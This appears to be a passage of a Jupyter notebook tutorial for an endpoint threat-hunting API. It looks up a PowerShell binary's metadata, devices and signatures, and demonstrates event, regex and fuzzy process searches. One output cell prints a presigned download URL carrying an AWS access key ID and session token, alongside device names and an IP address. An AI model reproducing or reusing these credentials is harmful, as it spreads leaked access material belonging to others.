 'company_name': 'Microsoft Corporation',
 'copyright': '© Microsoft Corporation. All rights reserved.',
 'file_available': True,
 'file_description': 'Windows PowerShell',
 'file_size': 430080,
 'file_version': '10.0.15063.0 (WinBuild.160101.0800)',
 'internal_name': 'POWERSHELL',
 'lang_id': 1033,
 'md5': 'be8ffebe1c4b5e18a56101a3c0604ea0',
 'original_filename': 'PowerShell.EXE',
 'os_type': 'WINDOWS',
 'private_build': None,
 'product_description': None,
 'product_name': 'Microsoft® Windows® Operating System',
 'product_version': '10.0.15063.0',
 'sha256': 'd2434e607451a4d29d28f43a529246dc81d25a2fae9c271e28c55452c09a28a5',
 'special_build': None,
 'trademark': None}


Let's also find some information on devices that have this file, paths where it was seen and signatures it has:

In [25]:
res = th.get_object(f"/ubs/v1/orgs/{orgkey}/sha256/d2434e607451a4d29d28f43a529246dc81d25a2fae9c271e28c55452c09a28a5/summary/device")
pprint.pprint(res)
res = th.get_object(f"/ubs/v1/orgs/{orgkey}/sha256/d2434e607451a4d29d28f43a529246dc81d25a2fae9c271e28c55452c09a28a5/summary/file_path")
pprint.pprint(res)
res = th.get_object(f"/ubs/v1/orgs/{orgkey}/sha256/d2434e607451a4d29d28f43a529246dc81d25a2fae9c271e28c55452c09a28a5/summary/signature")
pprint.pprint(res)

{'first_seen_device_id': 8657447,
 'first_seen_device_name': 'DESKTOP-1A1JGO5',
 'first_seen_device_timestamp': '2019-04-25T07:16:29.942347Z',
 'last_seen_device_id': 9510900,
 'last_seen_device_name': 'DESKTOP-1A1JGO5',
 'last_seen_device_timestamp': '2019-05-29T10:58:20.152258Z',
 'num_devices': 5,
 'sha256': 'd2434e607451a4d29d28f43a529246dc81d25a2fae9c271e28c55452c09a28a5'}
{'file_path_count': 1,
 'file_paths': [{'count': 5,
                 'file_path': 'c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe',
                 'first_seen_timestamp': '2019-04-25T07:16:29.942347Z'}],
 'sha256': 'd2434e607451a4d29d28f43a529246dc81d25a2fae9c271e28c55452c09a28a5',
 'total_file_path_count': 5}
{'sha256': 'd2434e607451a4d29d28f43a529246dc81d25a2fae9c271e28c55452c09a28a5',
 'signatures': [{'count': 1,
                 'is_catalog_signature': True,
                 'issuer_name': 'Microsoft Windows Production PCA 2011',
                 'publisher_name': 'Microsoft Windows',
     

Finally, lets download the file:

In [26]:
ret = th.post_object(f"/ubs/v1/orgs/{orgkey}/file/_download", {"sha256": ["d2434e607451a4d29d28f43a529246dc81d25a2fae9c271e28c55452c09a28a5"]})
pprint.pprint(ret.json())

{'error': [],
 'found': [{'sha256': 'd2434e607451a4d29d28f43a529246dc81d25a2fae9c271e28c55452c09a28a5',
            'url': 'https://cdc-file-storage-production-us-east-1.s3.amazonaws.com/d2/43/4e/60/74/51/a4/d2/9d/28/f4/3a/52/92/46/dc/81/d2/5a/2f/ae/9c/27/1e/28/c5/54/52/c0/9a/28/a5/d2434e607451a4d29d28f43a529246dc81d25a2fae9c271e28c55452c09a28a5.zip?AWSAccessKeyId=ASIAVT6ZCSICH3DT73OA&Signature=%2FdozJf7VsdXlRTl33llHktBa5sI%3D&x-amz-security-token=AgoJb3JpZ2luX2VjEJv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIEw%2F019%2FMRs2kCchc8jFONxu%2B35kHeTPVKvxG9BP%2FumsAiEAqHXh80uLja1WyER7tmxzbRPrQoaiD6okPaOsJxsoEC4q4wMItP%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARABGgwzODY0NjU0MzYxNjQiDDSxF6SJygPpOPQWBCq3A2y10wpI8Kh1FxqpKI5w0LEXd%2FKXQvW5UhygHDXWA9YjeNmzyoM5sxMrmVR8bJX6wwZwH0EFTAR2L1Sx7vuW0VjdACBNm%2Fe3pV9LC%2BxTLdkiI5tYwXoXFyasQPaxBdzuvmpngRi%2B7cni9xzNlaVBy1A0%2FofFf6gB3NBq5JE0CySTG2dULSkmLtwnh6k43G5eu8rl3SKPhbjt9E5uW23Oi8p20Ui5nFwuYzyenpGAKiXYmtlej9JZEeEHCxptSj0Lx4G%2Fw0hLngRXQvaQu2URCiJmVVn6

This returns an CDC url where you go and download the binary. This file will expire in 1 hour (unless otherwise specified in the request)

# Some More Examples
Let's look at few additional search examples wich show power of ThreatHunter search APIs

## Searching Events
For a given process, find specific events based on condition

In [27]:
events = th.select(Event).where(process_guid='7YZFGDDN-008f8e78-000012a0-00000000-1d513d7ef9c51a8').and_(event_type='filemod').and_(filemod_name='\*content.outlook\*')
for event in events:
    print(event.filemod_name)


c:\users\enduser\appdata\local\microsoft\windows\inetcache\content.outlook\4f9r8p01\~$credit_cards_2018 (5).xlsm
c:\users\enduser\appdata\local\microsoft\windows\inetcache\content.outlook\4f9r8p01\~$credit_cards_2018 (5).xlsm


## Searching using Regex
Find processes that have long command lines and are not GoogleUpdate.exe

In [28]:
query = th.select(Process).where("process_cmdline:/.{150}.*/ -process_name:GoogleUpdate.exe")
print(query[0])
print(query[0].process_cmdline)

Process object, bound to https://defense-prod05.conferdeploy.net.
-------------------------------------------------------------------------------

       backend_timestamp: 2019-05-21T15:56:45.670Z
         childproc_count: 0
         crossproc_count: 0
            device_group: standard
               device_id: 8929889
      device_internal_ip: 129.213.132.139
             device_name: desktop-1a1jgo5
               device_os: WINDOWS
        device_timestamp: 2019-05-06T23:41:34.451Z
       event_description: The application "<share><link hash="d2434e60745...
                event_id: 7fe02710705811e9a589af189dc2d600
              event_type: CREATE_PROCESS
           filemod_count: 0
    kinesis_partition_id: 7YZFGDDN:0
                  legacy: True
           modload_count: 0
           netconn_count: 0
                  org_id: 7YZFGDDN
           org_size_perc: 9
             parent_guid: 7YZFGDDN-00884261-00000544-00000000-1d504653629...
             parent_hash: ['5948a6366c6

## Fuzzy Searching 
Find all processes that are named similar to conhost.exe but are not conhost.exe

In [29]:
query = th.select(Process).where("process_name:conhost.exe~1 -process_name:conhost.exe")
print(len(list(query)))


0
